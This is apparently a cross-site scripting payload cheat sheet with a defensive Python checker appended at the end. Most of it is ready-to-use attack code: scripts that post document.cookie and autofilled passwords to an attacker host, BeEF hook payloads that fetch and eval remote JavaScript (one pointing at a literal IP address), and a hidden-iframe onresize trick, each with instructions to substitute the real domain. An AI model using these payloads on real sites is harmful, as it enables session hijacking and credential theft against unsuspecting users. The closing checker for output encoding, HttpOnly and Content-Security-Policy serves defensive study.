XSS
HTML Context
<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.cookie)>
XSS Exploit
Steal Cookie
Replace evil-website.com in the code with the actual domain.
<script>
fetch("https://evil-website.com", {
method: "POST",
mode: "no-cors",
body: JSON.stringify({ cookie: document.cookie }),
});
</script>
Steal Password
Only works for users whose browser has password autofill enabled.
Replace evil-website.com in the code with the actual domain.
<input name="username" id="username" />
<input
name="password"
id="password"
type="password"
onchange="if(this.value.length) fetch('https://evil-website.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});"
/>
Hook Browser (beef)
<script src="47.106.10.108"></script>
<body
onload="fetch('http://evil-website.com:3000/hook.js')
.then(response => response.text())
.then(script => eval(script))
.catch(error => console.error('Error:', error));"
>
<body
onload="
fetch('http://evilwebsite:3000/hook.js')
.then(function(response) {
return response.text();
})
.then(function(script) {
eval(script);
})
"
>
<body
onload="
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://evil-website.com:3000/hook.js', true);
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200)
eval(xhr.responseText);
};
xhr.send();
"
>
Experiment
onresize event (GET)
You need to start an HTTP service for the victim to access.
Replace vulnerable-website.com in the code with the actual domain. Replace <xss-parameter> in the code with the actual parameter. Replace <%3Cbody%20onresize=%22print()%22%3E> in the code with the actual payload. The decoded value is:
<body onresize="print()">
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<iframe
src="https://vulnerable-website.com/?<xss-parameter>=<%3Cbody%20onresize=%22print()%22%3E>"
onload="this.style.width='0'; this.style.height='0'"
></iframe>
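Every payload on this page depends on three things: user input reflected unencoded into an HTML context, a session cookie that document.cookie can read, and no policy restricting where the page may fetch from, load scripts from, or be framed from. The following is an added example, not code from the original page: a small Python checker that output-encodes the two HTML-context payloads and evaluates a Set-Cookie header and a Content-Security-Policy against the cookie-theft, hook.js and iframe vectors above. The page origin, headers and policies it uses are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed inputs: the payloads are the two from "HTML Context" above; the origin is made up.
PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    "<img src=x onerror=alert(document.cookie)>",
]
PAGE_ORIGIN = "https://vulnerable-website.com"

def encode_for_html(untrusted: str) -> str:
    """Encode untrusted data for an HTML body or quoted-attribute context,
    so the browser renders it as text instead of parsing it as markup."""
    return html.escape(untrusted, quote=True)

def cookie_exposed_to_script(set_cookie: str) -> bool:
    """True when a Set-Cookie header lacks HttpOnly, i.e. document.cookie
    (and so the cookie-theft payload) can read the value."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return "httponly" not in attrs

def _parse_csp(csp: str) -> dict:
    policy = {}
    for directive in csp.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy

def csp_allows(csp: str, directive: str, url: str, page_origin: str = PAGE_ORIGIN) -> bool:
    """Would the policy let `directive` reach `url`? connect-src governs the fetch/XHR
    exfil, script-src the remote hook.js, frame-ancestors the iframe trick. Fetch
    directives fall back to default-src; frame-ancestors does not. No policy allows all."""
    policy = _parse_csp(csp)
    if directive == "frame-ancestors":
        sources = policy.get(directive)
    else:
        sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True
    target = urlsplit(url)
    origin = f"{target.scheme}://{target.netloc}".lower()
    for src in sources:
        s = src.strip("'").lower()
        if s == "none":
            return False
        if s in ("*", origin, target.scheme + ":") or (s == "self" and origin == page_origin.lower()):
            return True
    return False
```

Run it against a real response's headers to see which of the vectors above would still work; a default-src policy alone does not stop the framing trick because frame-ancestors has no fallback.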